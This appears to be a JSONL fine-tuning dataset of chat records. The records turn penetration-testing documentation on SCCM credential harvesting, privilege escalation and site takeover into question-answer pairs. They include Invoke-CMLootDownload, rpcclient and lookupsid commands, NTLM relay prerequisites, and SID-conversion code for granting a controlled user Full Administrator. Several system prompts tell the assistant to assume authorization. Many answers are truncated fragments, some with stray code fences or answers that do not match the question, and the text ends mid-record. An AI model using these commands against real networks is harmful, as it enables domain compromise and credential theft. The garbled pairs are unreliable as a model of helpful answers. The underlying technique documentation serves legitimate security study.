"Invoke-CMLootDownload -SingleFile \\\\sccm\\SCCMContentLib$\\DataLib\\SC100001.1\\x86\\MigApp.xml", "metadata": {"corpus_index": 1074, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Download all files with a specific extension"}, {"role": "assistant", "content": "Invoke-CMLootDownload -InventoryFile .\\sccmfiles.txt -Extension ps1\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Download all files with a specific extension", "response": "Invoke-CMLootDownload -InventoryFile .\\sccmfiles.txt -Extension ps1\n```\n\n:::", "metadata": {"corpus_index": 1075, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Download all files with a specific extension"}, {"role": "assistant", "content": "Invoke-CMLootDownload -InventoryFile .\\sccmfiles.txt -Extension ps1\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Download all files with a specific extension", "response": "Invoke-CMLootDownload -InventoryFile .\\sccmfiles.txt -Extension ps1\n```\n\n:::", "metadata": {"corpus_index": 1075, "category": "web", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/credential-harvesting.md", "page_title": "Credential harvesting", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Privilege escalation - Theory"}, {"role": "assistant", "content": "There are currently three different pathways for privilege escalation in an SCCM environment in order to take control over the infrastructure:\n\n* Credential harvesting\n* Client Push account authentication coercion\n* SCCM site takeover"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Privilege escalation - Theory", "response": "There are currently three different pathways for privilege escalation in an SCCM environment in order to take control over the infrastructure:\n\n* Credential harvesting\n* Client Push account authentication coercion\n* SCCM site takeover", "metadata": {"corpus_index": 1076, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/index.md", "page_title": "Privilege escalation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Privilege escalation - Theory?"}, {"role": "assistant", "content": "There are currently three different pathways for privilege escalation in an SCCM environment in order to take control over the infrastructure:\n\n* Credential harvesting\n* Client Push account authentication coercion\n* SCCM site takeover"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Privilege escalation - Theory?", "response": "There are currently three different pathways for privilege escalation in an SCCM environment in order to take control over the infrastructure:\n\n* Credential harvesting\n* Client Push account authentication coercion\n* SCCM site takeover", "metadata": {"corpus_index": 1076, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/index.md", "page_title": "Privilege escalation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Privilege escalation - Credential harvesting?"}, {"role": "assistant", "content": "An SCCM infrastructure may contain a wide range of cleartext credentials accessible from various levels of privileges. Some credentials can be associated with privileged accounts in the domain. From a privilege escalation perspective, we are interested in secrets retrievable using an SCCM client or a low-privilege account in the domain.\n\n> [!TIP]\n> Read the credential harvesting article for detailed information on harvesting secrets from SCCM policies and Distribution Points."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Privilege escalation - Credential harvesting?", "response": "An SCCM infrastructure may contain a wide range of cleartext credentials accessible from various levels of privileges. Some credentials can be associated with privileged accounts in the domain. From a privilege escalation perspective, we are interested in secrets retrievable using an SCCM client or a low-privilege account in the domain.\n\n> [!TIP]\n> Read the credential harvesting article for detailed information on harvesting secrets from SCCM policies and Distribution Points.", "metadata": {"corpus_index": 1077, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/index.md", "page_title": "Privilege escalation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Privilege escalation - Credential harvesting during a pentest?"}, {"role": "assistant", "content": "An SCCM infrastructure may contain a wide range of cleartext credentials accessible from various levels of privileges. Some credentials can be associated with privileged accounts in the domain. From a privilege escalation perspective, we are interested in secrets retrievable using an SCCM client or a low-privilege account in the domain.\n\n> [!TIP]\n> Read the credential harvesting article for detailed information on harvesting secrets from SCCM policies and Distribution Points."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Privilege escalation - Credential harvesting during a pentest?", "response": "An SCCM infrastructure may contain a wide range of cleartext credentials accessible from various levels of privileges. Some credentials can be associated with privileged accounts in the domain. From a privilege escalation perspective, we are interested in secrets retrievable using an SCCM client or a low-privilege account in the domain.\n\n> [!TIP]\n> Read the credential harvesting article for detailed information on harvesting secrets from SCCM policies and Distribution Points.", "metadata": {"corpus_index": 1077, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/index.md", "page_title": "Privilege escalation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Privilege escalation - SCCM site takeover work?"}, {"role": "assistant", "content": "Some SCCM configurations make it possible to abuse the permissions of the site server / passive site server machine accounts in order to compromise the SCCM infrastructure via relay attacks.\n\n> [!TIP]\n> Read the site takeover article for detailed information on SCCM site takeover techniques."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Privilege escalation - SCCM site takeover work?", "response": "Some SCCM configurations make it possible to abuse the permissions of the site server / passive site server machine accounts in order to compromise the SCCM infrastructure via relay attacks.\n\n> [!TIP]\n> Read the site takeover article for detailed information on SCCM site takeover techniques.", "metadata": {"corpus_index": 1078, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/index.md", "page_title": "Privilege escalation", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Privilege escalation - SCCM site takeover?"}, {"role": "assistant", "content": "Some SCCM configurations make it possible to abuse the permissions of the site server / passive site server machine accounts in order to compromise the SCCM infrastructure via relay attacks.\n\n> [!TIP]\n> Read the site takeover article for detailed information on SCCM site takeover techniques."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Privilege escalation - SCCM site takeover?", "response": "Some SCCM configurations make it possible to abuse the permissions of the site server / passive site server machine accounts in order to compromise the SCCM infrastructure via relay attacks.\n\n> [!TIP]\n> Read the site takeover article for detailed information on SCCM site takeover techniques.", "metadata": {"corpus_index": 1078, "category": "credentials", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/index.md", "page_title": "Privilege escalation", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe SCCM site takeover - Relaying the primary site server in the context of penetration testing"}, {"role": "assistant", "content": "A site server machine account is required to be member of the local Administrators group on the site database server and on every site server hosting the \"SMS Provider\" role in the hierarchy (See SCCM Topology):\n\n> The user account that installs the site must have the following permissions:\n>\n> * Administrator on the following servers:\n> * The site server\n> * Each SQL Server that hosts the site database\n> * Each instance of the SMS Provider for the site\n> * Sysadmin on the instance of SQL Server that hosts the site database\n>\n> _(source:_ _Microsoft.com__)_\n\nAs a result, NTLM authentication data can be obtained from an SCCM primary site server and relayed in order to obtain administrative access to the site database, or interact as a local administrator with the HTTP API on the SMS Provider. In both cases, this can lead to the full compromise of the SCCM infrastructure."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe SCCM site takeover - Relaying the primary site server in the context of penetration testing", "response": "A site server machine account is required to be member of the local Administrators group on the site database server and on every site server hosting the \"SMS Provider\" role in the hierarchy (See SCCM Topology):\n\n> The user account that installs the site must have the following permissions:\n>\n> * Administrator on the following servers:\n> * The site server\n> * Each SQL Server that hosts the site database\n> * Each instance of the SMS Provider for the site\n> * Sysadmin on the instance of SQL Server that hosts the site database\n>\n> _(source:_ _Microsoft.com__)_\n\nAs a result, NTLM authentication data can be obtained from an SCCM primary site server and relayed in order to obtain administrative access to the site database, or interact as a local administrator with the HTTP API on the SMS Provider. In both cases, this can lead to the full compromise of the SCCM infrastructure.", "metadata": {"corpus_index": 1079, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform SCCM site takeover - Relaying the primary site server?"}, {"role": "assistant", "content": "A site server machine account is required to be member of the local Administrators group on the site database server and on every site server hosting the \"SMS Provider\" role in the hierarchy (See SCCM Topology):\n\n> The user account that installs the site must have the following permissions:\n>\n> * Administrator on the following servers:\n> * The site server\n> * Each SQL Server that hosts the site database\n> * Each instance of the SMS Provider for the site\n> * Sysadmin on the instance of SQL Server that hosts the site database\n>\n> _(source:_ _Microsoft.com__)_\n\nAs a result, NTLM authentication data can be obtained from an SCCM primary site server and relayed in order to obtain administrative access to the site database, or interact as a local administrator with the HTTP API on the SMS Provider. In both cases, this can lead to the full compromise of the SCCM infrastructure."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform SCCM site takeover - Relaying the primary site server?", "response": "A site server machine account is required to be member of the local Administrators group on the site database server and on every site server hosting the \"SMS Provider\" role in the hierarchy (See SCCM Topology):\n\n> The user account that installs the site must have the following permissions:\n>\n> * Administrator on the following servers:\n> * The site server\n> * Each SQL Server that hosts the site database\n> * Each instance of the SMS Provider for the site\n> * Sysadmin on the instance of SQL Server that hosts the site database\n>\n> _(source:_ _Microsoft.com__)_\n\nAs a result, NTLM authentication data can be obtained from an SCCM primary site server and relayed in order to obtain administrative access to the site database, or interact as a local administrator with the HTTP API on the SMS Provider. In both cases, this can lead to the full compromise of the SCCM infrastructure.", "metadata": {"corpus_index": 1079, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about SCCM site takeover - Relaying a passive site server?"}, {"role": "assistant", "content": "As described by Garrett Foster in this article, when a passive site server is set up for high availability purpose, its machine account must be a member of the local Administrators group on the active site server. It must also be administrator on all the site system deployed in the site, including the MSSQL database. As a result, the same NTLM relaying attacks as described for primary site servers can be exploited in order to compromise the SCCM site database or gain privileged access to the HTTP API of the SMS Provider."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about SCCM site takeover - Relaying a passive site server?", "response": "As described by Garrett Foster in this article, when a passive site server is set up for high availability purpose, its machine account must be a member of the local Administrators group on the active site server. It must also be administrator on all the site system deployed in the site, including the MSSQL database. As a result, the same NTLM relaying attacks as described for primary site servers can be exploited in order to compromise the SCCM site database or gain privileged access to the HTTP API of the SMS Provider.", "metadata": {"corpus_index": 1080, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out SCCM site takeover - Relaying a passive site server during a pentest?"}, {"role": "assistant", "content": "As described by Garrett Foster in this article, when a passive site server is set up for high availability purpose, its machine account must be a member of the local Administrators group on the active site server. It must also be administrator on all the site system deployed in the site, including the MSSQL database. As a result, the same NTLM relaying attacks as described for primary site servers can be exploited in order to compromise the SCCM site database or gain privileged access to the HTTP API of the SMS Provider."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out SCCM site takeover - Relaying a passive site server during a pentest?", "response": "As described by Garrett Foster in this article, when a passive site server is set up for high availability purpose, its machine account must be a member of the local Administrators group on the active site server. It must also be administrator on all the site system deployed in the site, including the MSSQL database. As a result, the same NTLM relaying attacks as described for primary site servers can be exploited in order to compromise the SCCM site database or gain privileged access to the HTTP API of the SMS Provider.", "metadata": {"corpus_index": 1080, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain SCCM site takeover - Practice"}, {"role": "assistant", "content": "> [!TIP]\n> For more details about how these attacks work, refer to the article \"SCCM Site Takeover via Automatic Client Push Installation\" by Chris Thompson for the database attack, and \"Site Takeover via SCCM's AdminService API\" by Garrett Foster for the HTTP one."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain SCCM site takeover - Practice", "response": "> [!TIP]\n> For more details about how these attacks work, refer to the article \"SCCM Site Takeover via Automatic Client Push Installation\" by Chris Thompson for the database attack, and \"Site Takeover via SCCM's AdminService API\" by Garrett Foster for the HTTP one.", "metadata": {"corpus_index": 1081, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on SCCM site takeover - Practice"}, {"role": "assistant", "content": "> [!TIP]\n> For more details about how these attacks work, refer to the article \"SCCM Site Takeover via Automatic Client Push Installation\" by Chris Thompson for the database attack, and \"Site Takeover via SCCM's AdminService API\" by Garrett Foster for the HTTP one."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on SCCM site takeover - Practice", "response": "> [!TIP]\n> For more details about how these attacks work, refer to the article \"SCCM Site Takeover via Automatic Client Push Installation\" by Chris Thompson for the database attack, and \"Site Takeover via SCCM's AdminService API\" by Garrett Foster for the HTTP one.", "metadata": {"corpus_index": 1081, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain SCCM site takeover - Relay to the MSSQL site database"}, {"role": "assistant", "content": "> [!CAUTION]\n> Some requirements are needed to perform the attack:\n> \n> * automatic site assignment and automatic site-wide client push installation are enabled\n> * fallback to NTLM authentication is enabled (default)\n> * the hotfix KB15599094 is not installed (it prevents the client push installation account to perform an NTLM connection to a client)\n> * PKI certificates are not required for client authentication (default)\n> * either:\n> \n> * MSSQL is reachable on the site database server\n> \n> OR\n> \n> * SMB is reachable and SMB signing isn't required on the site database server\n> * knowing the three-character site code for the SCCM site is required (step 3 below)\n> * knowing the NetBIOS name, FQDN, or IP address of a site management point is required\n> * knowing the NetBIOS name, FQDN, or IP address of the site database server is required\n> \n> The first four requirements above apply to the client push installation coercion technique. But without them, a regular coercion technique could still be used (petitpotam, printerbug, etc.)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain SCCM site takeover - Relay to the MSSQL site database", "response": "> [!CAUTION]\n> Some requirements are needed to perform the attack:\n> \n> * automatic site assignment and automatic site-wide client push installation are enabled\n> * fallback to NTLM authentication is enabled (default)\n> * the hotfix KB15599094 is not installed (it prevents the client push installation account to perform an NTLM connection to a client)\n> * PKI certificates are not required for client authentication (default)\n> * either:\n> \n> * MSSQL is reachable on the site database server\n> \n> OR\n> \n> * SMB is reachable and SMB signing isn't required on the site database server\n> * knowing the three-character site code for the SCCM site is required (step 3 below)\n> * knowing the NetBIOS name, FQDN, or IP address of a site management point is required\n> * knowing the NetBIOS name, FQDN, or IP address of the site database server is required\n> \n> The first four requirements above apply to the client push installation coercion technique. But without them, a regular coercion technique could still be used (petitpotam, printerbug, etc.).", "metadata": {"corpus_index": 1082, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute SCCM site takeover - Relay to the MSSQL site database?"}, {"role": "assistant", "content": "> [!CAUTION]\n> Some requirements are needed to perform the attack:\n> \n> * automatic site assignment and automatic site-wide client push installation are enabled\n> * fallback to NTLM authentication is enabled (default)\n> * the hotfix KB15599094 is not installed (it prevents the client push installation account to perform an NTLM connection to a client)\n> * PKI certificates are not required for client authentication (default)\n> * either:\n> \n> * MSSQL is reachable on the site database server\n> \n> OR\n> \n> * SMB is reachable and SMB signing isn't required on the site database server\n> * knowing the three-character site code for the SCCM site is required (step 3 below)\n> * knowing the NetBIOS name, FQDN, or IP address of a site management point is required\n> * knowing the NetBIOS name, FQDN, or IP address of the site database server is required\n> \n> The first four requirements above apply to the client push installation coercion technique. But without them, a regular coercion technique could still be used (petitpotam, printerbug, etc.)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute SCCM site takeover - Relay to the MSSQL site database?", "response": "> [!CAUTION]\n> Some requirements are needed to perform the attack:\n> \n> * automatic site assignment and automatic site-wide client push installation are enabled\n> * fallback to NTLM authentication is enabled (default)\n> * the hotfix KB15599094 is not installed (it prevents the client push installation account to perform an NTLM connection to a client)\n> * PKI certificates are not required for client authentication (default)\n> * either:\n> \n> * MSSQL is reachable on the site database server\n> \n> OR\n> \n> * SMB is reachable and SMB signing isn't required on the site database server\n> * knowing the three-character site code for the SCCM site is required (step 3 below)\n> * knowing the NetBIOS name, FQDN, or IP address of a site management point is required\n> * knowing the NetBIOS name, FQDN, or IP address of the site database server is required\n> \n> The first four requirements above apply to the client push installation coercion technique. But without them, a regular coercion technique could still be used (petitpotam, printerbug, etc.).", "metadata": {"corpus_index": 1082, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is SCCM site takeover - Step 1: retrieve the controlled user SID?"}, {"role": "assistant", "content": "The first step consists in retrieving the hexadecimal format of the user's SID (Security IDentifier) to grant \"Full Administrator SCCM role\" to, on the site database server. The hex formatted SID is needed in a part below: Step 4: Obtain an SQL console.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the Samba utility named rpcclient can be used for this purpose.\n\n``bash\nrpcclient -c \"lookupnames $USER\" $TARGET_IP\n`\n\nImpacket's lookupsid (Python) can also be used to retrieve the user's SID.\n\n`bash\nlookupsid.py \"$DOMAIN\"/\"$USERNAME\":\"$PASSWORD\"@\"$TARGET_IP_OR_NAME\"\n`\n\nThe returned SID value is in canonical format and not hexadecimal, impacket can be used to convert it as follows.\n\n`python\nfrom impacket.ldap import ldaptypes\nsid=ldaptypes.LDAP_SID()\nsid.fromCanonical('sid_value')\nprint('0x' + ''.join('{:02X}'.format(b) for b in sid.getData()))\n`\n\n=== Windows\n\nFrom Windows systems, SharpSCCM (C#) can be used for this purpose.\n\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is SCCM site takeover - Step 1: retrieve the controlled user SID?", "response": "The first step consists in retrieving the hexadecimal format of the user's SID (Security IDentifier) to grant \"Full Administrator SCCM role\" to, on the site database server. The hex formatted SID is needed in a part below: Step 4: Obtain an SQL console.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the Samba utility named rpcclient can be used for this purpose.\n\n``bash\nrpcclient -c \"lookupnames $USER\" $TARGET_IP\n`\n\nImpacket's lookupsid (Python) can also be used to retrieve the user's SID.\n\n`bash\nlookupsid.py \"$DOMAIN\"/\"$USERNAME\":\"$PASSWORD\"@\"$TARGET_IP_OR_NAME\"\n`\n\nThe returned SID value is in canonical format and not hexadecimal, impacket can be used to convert it as follows.\n\n`python\nfrom impacket.ldap import ldaptypes\nsid=ldaptypes.LDAP_SID()\nsid.fromCanonical('sid_value')\nprint('0x' + ''.join('{:02X}'.format(b) for b in sid.getData()))\n`\n\n=== Windows\n\nFrom Windows systems, SharpSCCM (C#) can be used for this purpose.\n\n``", "metadata": {"corpus_index": 1083, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through SCCM site takeover - Step 1: retrieve the controlled user SID"}, {"role": "assistant", "content": "The first step consists in retrieving the hexadecimal format of the user's SID (Security IDentifier) to grant \"Full Administrator SCCM role\" to, on the site database server. The hex formatted SID is needed in a part below: Step 4: Obtain an SQL console.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the Samba utility named rpcclient can be used for this purpose.\n\n``bash\nrpcclient -c \"lookupnames $USER\" $TARGET_IP\n`\n\nImpacket's lookupsid (Python) can also be used to retrieve the user's SID.\n\n`bash\nlookupsid.py \"$DOMAIN\"/\"$USERNAME\":\"$PASSWORD\"@\"$TARGET_IP_OR_NAME\"\n`\n\nThe returned SID value is in canonical format and not hexadecimal, impacket can be used to convert it as follows.\n\n`python\nfrom impacket.ldap import ldaptypes\nsid=ldaptypes.LDAP_SID()\nsid.fromCanonical('sid_value')\nprint('0x' + ''.join('{:02X}'.format(b) for b in sid.getData()))\n`\n\n=== Windows\n\nFrom Windows systems, SharpSCCM (C#) can be used for this purpose.\n\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through SCCM site takeover - Step 1: retrieve the controlled user SID", "response": "The first step consists in retrieving the hexadecimal format of the user's SID (Security IDentifier) to grant \"Full Administrator SCCM role\" to, on the site database server. The hex formatted SID is needed in a part below: Step 4: Obtain an SQL console.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the Samba utility named rpcclient can be used for this purpose.\n\n``bash\nrpcclient -c \"lookupnames $USER\" $TARGET_IP\n`\n\nImpacket's lookupsid (Python) can also be used to retrieve the user's SID.\n\n`bash\nlookupsid.py \"$DOMAIN\"/\"$USERNAME\":\"$PASSWORD\"@\"$TARGET_IP_OR_NAME\"\n`\n\nThe returned SID value is in canonical format and not hexadecimal, impacket can be used to convert it as follows.\n\n`python\nfrom impacket.ldap import ldaptypes\nsid=ldaptypes.LDAP_SID()\nsid.fromCanonical('sid_value')\nprint('0x' + ''.join('{:02X}'.format(b) for b in sid.getData()))\n`\n\n=== Windows\n\nFrom Windows systems, SharpSCCM (C#) can be used for this purpose.\n\n``", "metadata": {"corpus_index": 1083, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the rpcclient command for sccm site takeover - step 1: retrieve the controlled user sid"}, {"role": "assistant", "content": "rpcclient -c \"lookupnames $USER\" $TARGET_IP"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the rpcclient command for sccm site takeover - step 1: retrieve the controlled user sid", "response": "rpcclient -c \"lookupnames $USER\" $TARGET_IP", "metadata": {"corpus_index": 1084, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "rpcclient"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform SCCM site takeover - Step 1: retrieve the controlled user SID?"}, {"role": "assistant", "content": "rpcclient -c \"lookupnames $USER\" $TARGET_IP"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform SCCM site takeover - Step 1: retrieve the controlled user SID?", "response": "rpcclient -c \"lookupnames $USER\" $TARGET_IP", "metadata": {"corpus_index": 1084, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `rpcclient -c \"lookupnames $USER\" $TARGET_IP`?"}, {"role": "assistant", "content": "This command is used for sccm site takeover - step 1: retrieve the controlled user sid. Step 1: retrieve the controlled user SID"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `rpcclient -c \"lookupnames $USER\" $TARGET_IP`?", "response": "This command is used for sccm site takeover - step 1: retrieve the controlled user sid. 